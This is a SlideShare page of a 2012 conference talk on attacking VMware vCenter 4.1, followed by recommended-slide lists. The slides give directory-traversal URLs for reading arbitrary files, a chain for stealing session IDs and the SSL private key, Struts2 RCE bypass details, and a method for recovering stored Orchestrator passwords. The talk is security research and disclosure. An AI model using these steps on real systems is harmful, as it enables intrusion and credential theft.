SlideShare a Scribd company logo

How to hack VMware vCenter server in 60 seconds

Download as PPT, PDF
Positive Hack Days
Positive Hack Days
Technology
1 of 17
How to hack VMware vCenter server in 60 seconds Alexey Sintsov Alexander Minozhenko
Hijacking VMware @asintsov @al3xmin • Pen-testers at Digital Security • Researchers • DCG#7812 / Zeronights • FUN, FUN, FUN © 2002—2012, Digital
Hijacking VMware Our target © 2002—2012, Digital
Hijacking VMware VMware vCenter Server • VMware vCenter Server is solution to manage VMware vSphere • vSphere – virtualization operating system © 2002—2012, Digital
Hijacking VMware Pen-test… • Vmware vCenter version 4.1 update 1 Services: • Update Manager • vCenter Orchestrator • Chargeback • Other • Most of those services has web server © 2002—2012, Digital
Hijacking VMware VASTO and CVE-2009-1523 • Directory traversal in Jetty web server http://target:9084/vci/download/health.xml/%3f/../../../../FILE • Discovered by Claudio Criscione • Fixed in VMware Update Manager 4.1 update 1 :( • Who want to pay me for 0day? • Pentester is not resercher? © 2002—2012, Digital
Hijacking VMware 8( © 2002—2012, Digital
Hijacking VMware CVE-2010-1870 • VMware vCenter Orchestrator use Struts2 version 2.11 discovered by Digital Defense, Inc • CVE-2010-1870 Struts2/XWork remote command execution discovered by Meder Kydyraliev Fixed in 4.2 © 2002—2012, Digital
Hijacking VMware Details •Struts2 does not properly escape “#” •Could be bypass with unicode “u0023” •2 variables need to be set for RCE •#_memberAccess['allowStaticMethodAccess'] •#context['xwork.MethodAccessor.denyMethodExecution'] © 2002—2012, Digital
Hijacking VMware But what about us? • Directory traversal in Jetty web server … AGAIN! http://target:9084/vci/download/.%5C..%5C..%5C..%5C..%5C..%5C..%5C.. %5C..FILE.EXT •Metasploit module vmware_update_manager_traversal.rb by sinn3r • We can read any file! But what Claudio Criscione propose to read vpxd-profiler-* - /SessionStats/SessionPool/Session/Id='06B90BCB-A0A4-4B9C-B680- FB72656A1DCB'/Username=„FakeDomainFakeUser'/SoapSession/Id='A Sorry, patched in 4.1! D45B176-63F3-4421-BBF0-FE1603E543F4'/Count/total 1 Contains logs of SOAP requests with session ID !!! Discovered by Alexey Sintsov 8) © 2002—2012, Digital
Hijacking VMware Attack #1 • Read vpxd-profiler via traversal… • Get Admin’s IP addresses from it… • Read secret SSL key http://target:9084/vci/downloads/...............Documents and SettingsAll UsersApplication DataVMwareVMware VirtualCenterSSLrui.key • ARP-SPOOF with SSL key - PROFIT © 2002—2012, Digital
Hijacking VMware VMware vCenter Orchestrator • Vmware vCO – software for automate configuration and management • Install by default with vCenter • Have interesting file C:Program filesVMwareInfrastructureOrchestratorconfigurationj ettyetcpasswd.properties © 2002—2012, Digital
Hijacking VMware VMware vCenter Orchestrator Password disclosure Read hash -> crack MD5 -> log on into Orch. -> get vCenter pass © 2002—2012, Digital
Hijacking VMware VMware vCenter Orchestrator – more stuff • vCO stored password at files: • C:Program FilesVMwareInfrastructureOrchestratorapp- <virtual-infrastructure-host serverservervmoconfpluginsVC.xml <enabled>true</enabled> • C:Program FilesVMwareInfrastructureOrchestratorapp- <url>https://new-virtual-center-host:443/sdk</url> <administrator-username>vmware</administrator-username> serverservervmoconfvmo.properties <administrator- password>010506275767b74786b383a4a60be767864740329d5fcf 324ec7fc98b1e0aaeef </administrator-password> <pattern>%u</pattern> </virtual-infrastructure-host> © 2002—2012, Digital
Hijacking VMware Hmmm…. 006766e7964766a151e213a242665123568256c4031702d4c78454e5b575 f60654b vmware 00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e2 4726079 vcenter • Red bytes look like length • Green bytes in ASCII range • Black bytes random Discovered by Alexey Sintsov and Alexander Minozhenko © 2002—2012, Digital
Hijacking VMware 0day still not patched 8) © 2002—2012, Digital
Hijacking VMware gg and bb a.sintsov@dsec.ru @asintsov a.minozhenko@dsec.ru @al3xmin © 2002—2012, Digital

Recommended

Velero & Beyond: Backup & Restore for Kubernetes Applications (Cloud Native S...
Velero & Beyond: Backup & Restore for Kubernetes Applications (Cloud Native S...Velero & Beyond: Backup & Restore for Kubernetes Applications (Cloud Native S...
Velero & Beyond: Backup & Restore for Kubernetes Applications (Cloud Native S...Chakradhar Rao Jonagam
 
Federation of OpenStack clouds
Federation of OpenStack cloudsFederation of OpenStack clouds
Federation of OpenStack cloudsCoreStack
 
2016 SDMX Experts meeting, How to collect data using SDMX? Hubertus Cloodt, A...
2016 SDMX Experts meeting, How to collect data using SDMX? Hubertus Cloodt, A...2016 SDMX Experts meeting, How to collect data using SDMX? Hubertus Cloodt, A...
2016 SDMX Experts meeting, How to collect data using SDMX? Hubertus Cloodt, A...StatsCommunications
 
Velero search &amp; practice 20210609
Velero search &amp; practice 20210609Velero search &amp; practice 20210609
Velero search &amp; practice 20210609KAI CHU CHUNG
 
Live VM Migration
Live VM MigrationLive VM Migration
Live VM MigrationShivam Singh
 
Proxmox Talk - Linux Fest Northwest 2018
Proxmox Talk - Linux Fest Northwest 2018Proxmox Talk - Linux Fest Northwest 2018
Proxmox Talk - Linux Fest Northwest 2018Richard Clark
 
WASM! WASI! WAGI! WAT?
WASM! WASI! WAGI! WAT?WASM! WASI! WAGI! WAT?
WASM! WASI! WAGI! WAT?Stefan Baumgartner
 
Yahoo Cloud Serving Benchmark
Yahoo Cloud Serving BenchmarkYahoo Cloud Serving Benchmark
Yahoo Cloud Serving Benchmarkkevin han
 

Recommended

Velero & Beyond: Backup & Restore for Kubernetes Applications (Cloud Native S...
Velero & Beyond: Backup & Restore for Kubernetes Applications (Cloud Native S...Velero & Beyond: Backup & Restore for Kubernetes Applications (Cloud Native S...
Velero & Beyond: Backup & Restore for Kubernetes Applications (Cloud Native S...Chakradhar Rao Jonagam
 
Federation of OpenStack clouds
Federation of OpenStack cloudsFederation of OpenStack clouds
Federation of OpenStack cloudsCoreStack
 
2016 SDMX Experts meeting, How to collect data using SDMX? Hubertus Cloodt, A...
2016 SDMX Experts meeting, How to collect data using SDMX? Hubertus Cloodt, A...2016 SDMX Experts meeting, How to collect data using SDMX? Hubertus Cloodt, A...
2016 SDMX Experts meeting, How to collect data using SDMX? Hubertus Cloodt, A...StatsCommunications
 
Velero search &amp; practice 20210609
Velero search &amp; practice 20210609Velero search &amp; practice 20210609
Velero search &amp; practice 20210609KAI CHU CHUNG
 
Live VM Migration
Live VM MigrationLive VM Migration
Live VM MigrationShivam Singh
 
Proxmox Talk - Linux Fest Northwest 2018
Proxmox Talk - Linux Fest Northwest 2018Proxmox Talk - Linux Fest Northwest 2018
Proxmox Talk - Linux Fest Northwest 2018Richard Clark
 
WASM! WASI! WAGI! WAT?
WASM! WASI! WAGI! WAT?WASM! WASI! WAGI! WAT?
WASM! WASI! WAGI! WAT?Stefan Baumgartner
 
Yahoo Cloud Serving Benchmark
Yahoo Cloud Serving BenchmarkYahoo Cloud Serving Benchmark
Yahoo Cloud Serving Benchmarkkevin han
 
Squid Proxy Server
Squid Proxy ServerSquid Proxy Server
Squid Proxy Server13bcs0012
 
KVM tools and enterprise usage
KVM tools and enterprise usageKVM tools and enterprise usage
KVM tools and enterprise usagevincentvdk
 
Hyper-V y Contenedores, una nueva forma de virtualización
Hyper-V y Contenedores, una nueva forma de virtualizaciónHyper-V y Contenedores, una nueva forma de virtualización
Hyper-V y Contenedores, una nueva forma de virtualizaciónJuan Ignacio Oller Aznar
 
Veeam backup and_replication
Veeam backup and_replicationVeeam backup and_replication
Veeam backup and_replicationCheer Chain Enterprise Co., Ltd.
 
Docker + WASM.pdf
Docker + WASM.pdfDocker + WASM.pdf
Docker + WASM.pdfCatalin Jora
 
Apache Flume
Apache FlumeApache Flume
Apache FlumeGetInData
 
Ozone and HDFS's Evolution
Ozone and HDFS's EvolutionOzone and HDFS's Evolution
Ozone and HDFS's EvolutionDataWorks Summit
 
Introduction to Vagrant
Introduction to VagrantIntroduction to Vagrant
Introduction to VagrantMarcelo Pinheiro
 
Whats new in MQ V9.1
Whats new in MQ V9.1Whats new in MQ V9.1
Whats new in MQ V9.1David Ware
 
Deep dive into azure virtual machines
Deep dive into azure virtual machinesDeep dive into azure virtual machines
Deep dive into azure virtual machinesJasjit Chopra
 
Veean Backup & Replication
Veean Backup & ReplicationVeean Backup & Replication
Veean Backup & ReplicationArnaud PAIN
 
VMware vSphere
VMware vSphereVMware vSphere
VMware vSphere零壹科技股份有限公司
 
An Open-Source Chef Cookbook CI/CD Implementation Using Jenkins Pipelines
An Open-Source Chef Cookbook CI/CD Implementation Using Jenkins PipelinesAn Open-Source Chef Cookbook CI/CD Implementation Using Jenkins Pipelines
An Open-Source Chef Cookbook CI/CD Implementation Using Jenkins PipelinesSteffen Gebert
 
Hcx intro preso v2
Hcx intro preso v2Hcx intro preso v2
Hcx intro preso v2Parashar Singh
 
WebAssembly
WebAssemblyWebAssembly
WebAssemblyJens Siebert
 
Mirth Connect - Informations.pptx
Mirth Connect - Informations.pptxMirth Connect - Informations.pptx
Mirth Connect - Informations.pptxRafaelPaim17
 
What's new in MQ 9.1.* on z/OS
What's new in MQ 9.1.* on z/OSWhat's new in MQ 9.1.* on z/OS
What's new in MQ 9.1.* on z/OSMatt Leming
 
Managing ESXi - Tools and Techniques
Managing ESXi - Tools and TechniquesManaging ESXi - Tools and Techniques
Managing ESXi - Tools and TechniquesChristopher Janoch
 
Backroll: Production Grade KVM Backup Solution Integrated in CloudStack
Backroll: Production Grade KVM Backup Solution Integrated in CloudStackBackroll: Production Grade KVM Backup Solution Integrated in CloudStack
Backroll: Production Grade KVM Backup Solution Integrated in CloudStackShapeBlue
 
Getting Started With Amazon Redshift
Getting Started With Amazon Redshift Getting Started With Amazon Redshift
Getting Started With Amazon Redshift Matillion
 
vCenter and ESXi network port communications
vCenter and ESXi network port communicationsvCenter and ESXi network port communications
vCenter and ESXi network port communicationsAnimesh Dixit
 
Ceph Deployment at Target: Customer Spotlight
Ceph Deployment at Target: Customer SpotlightCeph Deployment at Target: Customer Spotlight
Ceph Deployment at Target: Customer SpotlightRed_Hat_Storage
 

More Related Content

What's hot

Squid Proxy Server
Squid Proxy ServerSquid Proxy Server
Squid Proxy Server13bcs0012
 
KVM tools and enterprise usage
KVM tools and enterprise usageKVM tools and enterprise usage
KVM tools and enterprise usagevincentvdk
 
Hyper-V y Contenedores, una nueva forma de virtualización
Hyper-V y Contenedores, una nueva forma de virtualizaciónHyper-V y Contenedores, una nueva forma de virtualización
Hyper-V y Contenedores, una nueva forma de virtualizaciónJuan Ignacio Oller Aznar
 
Apache Flume
Apache FlumeApache Flume
Apache FlumeGetInData
 
Ozone and HDFS's Evolution
Ozone and HDFS's EvolutionOzone and HDFS's Evolution
Ozone and HDFS's EvolutionDataWorks Summit
 
Whats new in MQ V9.1
Whats new in MQ V9.1Whats new in MQ V9.1
Whats new in MQ V9.1David Ware
 
Deep dive into azure virtual machines
Deep dive into azure virtual machinesDeep dive into azure virtual machines
Deep dive into azure virtual machinesJasjit Chopra
 
Veean Backup & Replication
Veean Backup & ReplicationVeean Backup & Replication
Veean Backup & ReplicationArnaud PAIN
 
An Open-Source Chef Cookbook CI/CD Implementation Using Jenkins Pipelines
An Open-Source Chef Cookbook CI/CD Implementation Using Jenkins PipelinesAn Open-Source Chef Cookbook CI/CD Implementation Using Jenkins Pipelines
An Open-Source Chef Cookbook CI/CD Implementation Using Jenkins PipelinesSteffen Gebert
 
Mirth Connect - Informations.pptx
Mirth Connect - Informations.pptxMirth Connect - Informations.pptx
Mirth Connect - Informations.pptxRafaelPaim17
 
What's new in MQ 9.1.* on z/OS
What's new in MQ 9.1.* on z/OSWhat's new in MQ 9.1.* on z/OS
What's new in MQ 9.1.* on z/OSMatt Leming
 
Managing ESXi - Tools and Techniques
Managing ESXi - Tools and TechniquesManaging ESXi - Tools and Techniques
Managing ESXi - Tools and TechniquesChristopher Janoch
 
Backroll: Production Grade KVM Backup Solution Integrated in CloudStack
Backroll: Production Grade KVM Backup Solution Integrated in CloudStackBackroll: Production Grade KVM Backup Solution Integrated in CloudStack
Backroll: Production Grade KVM Backup Solution Integrated in CloudStackShapeBlue
 
Getting Started With Amazon Redshift
Getting Started With Amazon Redshift Getting Started With Amazon Redshift
Getting Started With Amazon Redshift Matillion
 

What's hot (20)

Squid Proxy Server
Squid Proxy ServerSquid Proxy Server
Squid Proxy Server
 
KVM tools and enterprise usage
KVM tools and enterprise usageKVM tools and enterprise usage
KVM tools and enterprise usage
 
Hyper-V y Contenedores, una nueva forma de virtualización
Hyper-V y Contenedores, una nueva forma de virtualizaciónHyper-V y Contenedores, una nueva forma de virtualización
Hyper-V y Contenedores, una nueva forma de virtualización
 
Veeam backup and_replication
Veeam backup and_replicationVeeam backup and_replication
Veeam backup and_replication
 
Docker + WASM.pdf
Docker + WASM.pdfDocker + WASM.pdf
Docker + WASM.pdf
 
Apache Flume
Apache FlumeApache Flume
Apache Flume
 
Ozone and HDFS's Evolution
Ozone and HDFS's EvolutionOzone and HDFS's Evolution
Ozone and HDFS's Evolution
 
Introduction to Vagrant
Introduction to VagrantIntroduction to Vagrant
Introduction to Vagrant
 
Whats new in MQ V9.1
Whats new in MQ V9.1Whats new in MQ V9.1
Whats new in MQ V9.1
 
Deep dive into azure virtual machines
Deep dive into azure virtual machinesDeep dive into azure virtual machines
Deep dive into azure virtual machines
 
Veean Backup & Replication
Veean Backup & ReplicationVeean Backup & Replication
Veean Backup & Replication
 
VMware vSphere
VMware vSphereVMware vSphere
VMware vSphere
 
An Open-Source Chef Cookbook CI/CD Implementation Using Jenkins Pipelines
An Open-Source Chef Cookbook CI/CD Implementation Using Jenkins PipelinesAn Open-Source Chef Cookbook CI/CD Implementation Using Jenkins Pipelines
An Open-Source Chef Cookbook CI/CD Implementation Using Jenkins Pipelines
 
Hcx intro preso v2
Hcx intro preso v2Hcx intro preso v2
Hcx intro preso v2
 
WebAssembly
WebAssemblyWebAssembly
WebAssembly
 
Mirth Connect - Informations.pptx
Mirth Connect - Informations.pptxMirth Connect - Informations.pptx
Mirth Connect - Informations.pptx
 
What's new in MQ 9.1.* on z/OS
What's new in MQ 9.1.* on z/OSWhat's new in MQ 9.1.* on z/OS
What's new in MQ 9.1.* on z/OS
 
Managing ESXi - Tools and Techniques
Managing ESXi - Tools and TechniquesManaging ESXi - Tools and Techniques
Managing ESXi - Tools and Techniques
 
Backroll: Production Grade KVM Backup Solution Integrated in CloudStack
Backroll: Production Grade KVM Backup Solution Integrated in CloudStackBackroll: Production Grade KVM Backup Solution Integrated in CloudStack
Backroll: Production Grade KVM Backup Solution Integrated in CloudStack
 
Getting Started With Amazon Redshift
Getting Started With Amazon Redshift Getting Started With Amazon Redshift
Getting Started With Amazon Redshift
 

Viewers also liked

vCenter and ESXi network port communications
vCenter and ESXi network port communicationsvCenter and ESXi network port communications
vCenter and ESXi network port communicationsAnimesh Dixit
 
Ceph Deployment at Target: Customer Spotlight
Ceph Deployment at Target: Customer SpotlightCeph Deployment at Target: Customer Spotlight
Ceph Deployment at Target: Customer SpotlightRed_Hat_Storage
 
vSphere 6.5 Upgrade Order
vSphere 6.5 Upgrade OrdervSphere 6.5 Upgrade Order
vSphere 6.5 Upgrade OrderRobert Nelson
 
20 Common Ports and their purposes
20 Common Ports and their purposes 20 Common Ports and their purposes
20 Common Ports and their purposes MaryamAlGhaith
 
Hacking Microsoft Remote Desktop Services for Fun and Profit
Hacking Microsoft Remote Desktop Services for Fun and ProfitHacking Microsoft Remote Desktop Services for Fun and Profit
Hacking Microsoft Remote Desktop Services for Fun and ProfitAlisa Esage Шевченко
 
Presentazione Corso VMware vSphere 6.5
Presentazione Corso VMware vSphere 6.5Presentazione Corso VMware vSphere 6.5
Presentazione Corso VMware vSphere 6.5PRAGMA PROGETTI
 
Lançamento do novo vSphere VMware 6.5
Lançamento do novo vSphere VMware 6.5Lançamento do novo vSphere VMware 6.5
Lançamento do novo vSphere VMware 6.5Bravo Tecnologia
 
Nordic VMUG User Conference 2014 - Design VMware vCenter Server
Nordic VMUG User Conference 2014 - Design VMware vCenter ServerNordic VMUG User Conference 2014 - Design VMware vCenter Server
Nordic VMUG User Conference 2014 - Design VMware vCenter ServerAndrea Mauro
 
Limewood Event - VMware
Limewood Event - VMware Limewood Event - VMware
Limewood Event - VMware BlueChipICT
 
Cassandra Introduction & Features
Cassandra Introduction & FeaturesCassandra Introduction & Features
Cassandra Introduction & FeaturesPhil Peace
 
System Center 2012 - January Licensing Update
System Center 2012 - January Licensing UpdateSystem Center 2012 - January Licensing Update
System Center 2012 - January Licensing UpdateSoftchoice Corporation
 
Softchoice Webinar Series: VMware vSphere 5.1 Changes
Softchoice Webinar Series: VMware vSphere 5.1 ChangesSoftchoice Webinar Series: VMware vSphere 5.1 Changes
Softchoice Webinar Series: VMware vSphere 5.1 ChangesSoftchoice Corporation
 
You voiced your concerns. VMware listened: Major Adjustments to vSphere 5 lic...
You voiced your concerns. VMware listened: Major Adjustments to vSphere 5 lic...You voiced your concerns. VMware listened: Major Adjustments to vSphere 5 lic...
You voiced your concerns. VMware listened: Major Adjustments to vSphere 5 lic...Softchoice Corporation
 
SQL Server 2012 ile Gelen Yeni Özellikler
SQL Server 2012 ile Gelen Yeni ÖzelliklerSQL Server 2012 ile Gelen Yeni Özellikler
SQL Server 2012 ile Gelen Yeni Özelliklerturgaysahtiyan
 
Findability Day 2015 Mattias Ellison - Findwise - Enterprise Search and fin...
Findability Day 2015 Mattias Ellison - Findwise - Enterprise Search and fin...Findability Day 2015 Mattias Ellison - Findwise - Enterprise Search and fin...
Findability Day 2015 Mattias Ellison - Findwise - Enterprise Search and fin...Findwise
 
VMUGIT Meeting Pisa 2015 - SDS secondo VMware: VSAN e VVOL
VMUGIT Meeting Pisa 2015 - SDS secondo VMware: VSAN e VVOLVMUGIT Meeting Pisa 2015 - SDS secondo VMware: VSAN e VVOL
VMUGIT Meeting Pisa 2015 - SDS secondo VMware: VSAN e VVOLgguglie
 
Site Recovery Manager - Una visione architetturale
Site Recovery Manager - Una visione architetturaleSite Recovery Manager - Una visione architetturale
Site Recovery Manager - Una visione architetturalegguglie
 
SQL Server Performans İpuçları
SQL Server Performans İpuçlarıSQL Server Performans İpuçları
SQL Server Performans İpuçlarıturgaysahtiyan
 
Docker at Djangocon 2013 | Talk by Ken Cochrane
Docker at Djangocon 2013 | Talk by Ken CochraneDocker at Djangocon 2013 | Talk by Ken Cochrane
Docker at Djangocon 2013 | Talk by Ken CochranedotCloud
 
Virtual Space Race: How IT with The Right Stuff Creates a Competitive Advantage
Virtual Space Race: How IT with The Right Stuff Creates a Competitive AdvantageVirtual Space Race: How IT with The Right Stuff Creates a Competitive Advantage
Virtual Space Race: How IT with The Right Stuff Creates a Competitive AdvantageSoftchoice Corporation
 

Viewers also liked (20)

vCenter and ESXi network port communications
vCenter and ESXi network port communicationsvCenter and ESXi network port communications
vCenter and ESXi network port communications
 
Ceph Deployment at Target: Customer Spotlight
Ceph Deployment at Target: Customer SpotlightCeph Deployment at Target: Customer Spotlight
Ceph Deployment at Target: Customer Spotlight
 
vSphere 6.5 Upgrade Order
vSphere 6.5 Upgrade OrdervSphere 6.5 Upgrade Order
vSphere 6.5 Upgrade Order
 
20 Common Ports and their purposes
20 Common Ports and their purposes 20 Common Ports and their purposes
20 Common Ports and their purposes
 
Hacking Microsoft Remote Desktop Services for Fun and Profit
Hacking Microsoft Remote Desktop Services for Fun and ProfitHacking Microsoft Remote Desktop Services for Fun and Profit
Hacking Microsoft Remote Desktop Services for Fun and Profit
 
Presentazione Corso VMware vSphere 6.5
Presentazione Corso VMware vSphere 6.5Presentazione Corso VMware vSphere 6.5
Presentazione Corso VMware vSphere 6.5
 
Lançamento do novo vSphere VMware 6.5
Lançamento do novo vSphere VMware 6.5Lançamento do novo vSphere VMware 6.5
Lançamento do novo vSphere VMware 6.5
 
Nordic VMUG User Conference 2014 - Design VMware vCenter Server
Nordic VMUG User Conference 2014 - Design VMware vCenter ServerNordic VMUG User Conference 2014 - Design VMware vCenter Server
Nordic VMUG User Conference 2014 - Design VMware vCenter Server
 
Limewood Event - VMware
Limewood Event - VMware Limewood Event - VMware
Limewood Event - VMware
 
Cassandra Introduction & Features
Cassandra Introduction & FeaturesCassandra Introduction & Features
Cassandra Introduction & Features
 
System Center 2012 - January Licensing Update
System Center 2012 - January Licensing UpdateSystem Center 2012 - January Licensing Update
System Center 2012 - January Licensing Update
 
Softchoice Webinar Series: VMware vSphere 5.1 Changes
Softchoice Webinar Series: VMware vSphere 5.1 ChangesSoftchoice Webinar Series: VMware vSphere 5.1 Changes
Softchoice Webinar Series: VMware vSphere 5.1 Changes
 
You voiced your concerns. VMware listened: Major Adjustments to vSphere 5 lic...
You voiced your concerns. VMware listened: Major Adjustments to vSphere 5 lic...You voiced your concerns. VMware listened: Major Adjustments to vSphere 5 lic...
You voiced your concerns. VMware listened: Major Adjustments to vSphere 5 lic...
 
SQL Server 2012 ile Gelen Yeni Özellikler
SQL Server 2012 ile Gelen Yeni ÖzelliklerSQL Server 2012 ile Gelen Yeni Özellikler
SQL Server 2012 ile Gelen Yeni Özellikler
 
Findability Day 2015 Mattias Ellison - Findwise - Enterprise Search and fin...
Findability Day 2015 Mattias Ellison - Findwise - Enterprise Search and fin...Findability Day 2015 Mattias Ellison - Findwise - Enterprise Search and fin...
Findability Day 2015 Mattias Ellison - Findwise - Enterprise Search and fin...
 
VMUGIT Meeting Pisa 2015 - SDS secondo VMware: VSAN e VVOL
VMUGIT Meeting Pisa 2015 - SDS secondo VMware: VSAN e VVOLVMUGIT Meeting Pisa 2015 - SDS secondo VMware: VSAN e VVOL
VMUGIT Meeting Pisa 2015 - SDS secondo VMware: VSAN e VVOL
 
Site Recovery Manager - Una visione architetturale
Site Recovery Manager - Una visione architetturaleSite Recovery Manager - Una visione architetturale
Site Recovery Manager - Una visione architetturale
 
SQL Server Performans İpuçları
SQL Server Performans İpuçlarıSQL Server Performans İpuçları
SQL Server Performans İpuçları
 
Docker at Djangocon 2013 | Talk by Ken Cochrane
Docker at Djangocon 2013 | Talk by Ken CochraneDocker at Djangocon 2013 | Talk by Ken Cochrane
Docker at Djangocon 2013 | Talk by Ken Cochrane
 
Virtual Space Race: How IT with The Right Stuff Creates a Competitive Advantage
Virtual Space Race: How IT with The Right Stuff Creates a Competitive AdvantageVirtual Space Race: How IT with The Right Stuff Creates a Competitive Advantage
Virtual Space Race: How IT with The Right Stuff Creates a Competitive Advantage
 

Similar to How to hack VMware vCenter server in 60 seconds

[OpenStack Day in Korea 2015] Track 1-4 - VDI OpenStack? It Works!!!
[OpenStack Day in Korea 2015] Track 1-4 - VDI OpenStack? It Works!!![OpenStack Day in Korea 2015] Track 1-4 - VDI OpenStack? It Works!!!
[OpenStack Day in Korea 2015] Track 1-4 - VDI OpenStack? It Works!!!OpenStack Korea Community
 
vCenter Server 5.5 Single Sign-On VMDir deep dive
vCenter Server 5.5 Single Sign-On VMDir deep divevCenter Server 5.5 Single Sign-On VMDir deep dive
vCenter Server 5.5 Single Sign-On VMDir deep divefbuechsel
 
Configuring and Troubleshooting XenDesktop Sites
Configuring and Troubleshooting XenDesktop SitesConfiguring and Troubleshooting XenDesktop Sites
Configuring and Troubleshooting XenDesktop SitesDavid McGeough
 
EUC State of the Union 2021
EUC State of the Union 2021EUC State of the Union 2021
EUC State of the Union 2021Marius Sandbu
 
Vsicm51 m02 virtualization_intro_
Vsicm51 m02 virtualization_intro_Vsicm51 m02 virtualization_intro_
Vsicm51 m02 virtualization_intro_VCAP5_wordpress
 
Securing your Cloud Environment
Securing your Cloud EnvironmentSecuring your Cloud Environment
Securing your Cloud EnvironmentShapeBlue
 
VDI-in-a-Box installation guide for Lab PCs
VDI-in-a-Box installation guide for Lab PCs VDI-in-a-Box installation guide for Lab PCs
VDI-in-a-Box installation guide for Lab PCs Changhyun Lim
 
ZertoCON_Support_Toolz.pdf
ZertoCON_Support_Toolz.pdfZertoCON_Support_Toolz.pdf
ZertoCON_Support_Toolz.pdftestslebew
 
CloudStack - Top 5 Technical Issues and Troubleshooting
CloudStack - Top 5 Technical Issues and TroubleshootingCloudStack - Top 5 Technical Issues and Troubleshooting
CloudStack - Top 5 Technical Issues and TroubleshootingShapeBlue
 
Securing your Cloud Environment v2
Securing your Cloud Environment v2Securing your Cloud Environment v2
Securing your Cloud Environment v2ShapeBlue
 
Securing a Windows Infrastructure using Windows Server 2012 & Windows 8 Built...
Securing a Windows Infrastructure using Windows Server 2012 & Windows 8 Built...Securing a Windows Infrastructure using Windows Server 2012 & Windows 8 Built...
Securing a Windows Infrastructure using Windows Server 2012 & Windows 8 Built...Microsoft TechNet - Belgium and Luxembourg
 
VMworld Europe 204: Technical Deep Dive on EVO: RAIL, the new VMware Hyper-Co...
VMworld Europe 204: Technical Deep Dive on EVO: RAIL, the new VMware Hyper-Co...VMworld Europe 204: Technical Deep Dive on EVO: RAIL, the new VMware Hyper-Co...
VMworld Europe 204: Technical Deep Dive on EVO: RAIL, the new VMware Hyper-Co...VMworld
 
VMworld 2013: Introducing NSX Service Composer: The New Consumption Model for...
VMworld 2013: Introducing NSX Service Composer: The New Consumption Model for...VMworld 2013: Introducing NSX Service Composer: The New Consumption Model for...
VMworld 2013: Introducing NSX Service Composer: The New Consumption Model for...VMworld
 
Automating That "Other" OS
Automating That "Other" OSAutomating That "Other" OS
Automating That "Other" OSJulian Dunn
 
SafeNet ProtectV Data Protection for Virtual Infrastructure
SafeNet ProtectV Data Protection for Virtual InfrastructureSafeNet ProtectV Data Protection for Virtual Infrastructure
SafeNet ProtectV Data Protection for Virtual InfrastructureLETA IT-company
 
Positive Technologies - S4 - Scada under x-rays
Positive Technologies - S4 - Scada under x-raysPositive Technologies - S4 - Scada under x-rays
Positive Technologies - S4 - Scada under x-raysqqlan
 
OSCON 2011 - Node.js Tutorial
OSCON 2011 - Node.js TutorialOSCON 2011 - Node.js Tutorial
OSCON 2011 - Node.js TutorialTom Croucher
 
VMWARE Professionals - Security, Multitenancy and Flexibility
VMWARE Professionals - Security, Multitenancy and FlexibilityVMWARE Professionals - Security, Multitenancy and Flexibility
VMWARE Professionals - Security, Multitenancy and FlexibilityPaulo Freitas
 

Similar to How to hack VMware vCenter server in 60 seconds (20)

[OpenStack Day in Korea 2015] Track 1-4 - VDI OpenStack? It Works!!!
[OpenStack Day in Korea 2015] Track 1-4 - VDI OpenStack? It Works!!![OpenStack Day in Korea 2015] Track 1-4 - VDI OpenStack? It Works!!!
[OpenStack Day in Korea 2015] Track 1-4 - VDI OpenStack? It Works!!!
 
vCenter Server 5.5 Single Sign-On VMDir deep dive
vCenter Server 5.5 Single Sign-On VMDir deep divevCenter Server 5.5 Single Sign-On VMDir deep dive
vCenter Server 5.5 Single Sign-On VMDir deep dive
 
VMware
VMwareVMware
VMware
 
Configuring and Troubleshooting XenDesktop Sites
Configuring and Troubleshooting XenDesktop SitesConfiguring and Troubleshooting XenDesktop Sites
Configuring and Troubleshooting XenDesktop Sites
 
EUC State of the Union 2021
EUC State of the Union 2021EUC State of the Union 2021
EUC State of the Union 2021
 
Vsicm51 m02 virtualization_intro_
Vsicm51 m02 virtualization_intro_Vsicm51 m02 virtualization_intro_
Vsicm51 m02 virtualization_intro_
 
Securing your Cloud Environment
Securing your Cloud EnvironmentSecuring your Cloud Environment
Securing your Cloud Environment
 
VDI-in-a-Box installation guide for Lab PCs
VDI-in-a-Box installation guide for Lab PCs VDI-in-a-Box installation guide for Lab PCs
VDI-in-a-Box installation guide for Lab PCs
 
ZertoCON_Support_Toolz.pdf
ZertoCON_Support_Toolz.pdfZertoCON_Support_Toolz.pdf
ZertoCON_Support_Toolz.pdf
 
CloudStack - Top 5 Technical Issues and Troubleshooting
CloudStack - Top 5 Technical Issues and TroubleshootingCloudStack - Top 5 Technical Issues and Troubleshooting
CloudStack - Top 5 Technical Issues and Troubleshooting
 
Securing your Cloud Environment v2
Securing your Cloud Environment v2Securing your Cloud Environment v2
Securing your Cloud Environment v2
 
VSICM8_M02.pptx
VSICM8_M02.pptxVSICM8_M02.pptx
VSICM8_M02.pptx
 
Securing a Windows Infrastructure using Windows Server 2012 & Windows 8 Built...
Securing a Windows Infrastructure using Windows Server 2012 & Windows 8 Built...Securing a Windows Infrastructure using Windows Server 2012 & Windows 8 Built...
Securing a Windows Infrastructure using Windows Server 2012 & Windows 8 Built...
 
VMworld Europe 204: Technical Deep Dive on EVO: RAIL, the new VMware Hyper-Co...
VMworld Europe 204: Technical Deep Dive on EVO: RAIL, the new VMware Hyper-Co...VMworld Europe 204: Technical Deep Dive on EVO: RAIL, the new VMware Hyper-Co...
VMworld Europe 204: Technical Deep Dive on EVO: RAIL, the new VMware Hyper-Co...
 
VMworld 2013: Introducing NSX Service Composer: The New Consumption Model for...
VMworld 2013: Introducing NSX Service Composer: The New Consumption Model for...VMworld 2013: Introducing NSX Service Composer: The New Consumption Model for...
VMworld 2013: Introducing NSX Service Composer: The New Consumption Model for...
 
Automating That "Other" OS
Automating That "Other" OSAutomating That "Other" OS
Automating That "Other" OS
 
SafeNet ProtectV Data Protection for Virtual Infrastructure
SafeNet ProtectV Data Protection for Virtual InfrastructureSafeNet ProtectV Data Protection for Virtual Infrastructure
SafeNet ProtectV Data Protection for Virtual Infrastructure
 
Positive Technologies - S4 - Scada under x-rays
Positive Technologies - S4 - Scada under x-raysPositive Technologies - S4 - Scada under x-rays
Positive Technologies - S4 - Scada under x-rays
 
OSCON 2011 - Node.js Tutorial
OSCON 2011 - Node.js TutorialOSCON 2011 - Node.js Tutorial
OSCON 2011 - Node.js Tutorial
 
VMWARE Professionals - Security, Multitenancy and Flexibility
VMWARE Professionals - Security, Multitenancy and FlexibilityVMWARE Professionals - Security, Multitenancy and Flexibility
VMWARE Professionals - Security, Multitenancy and Flexibility
 

More from Positive Hack Days

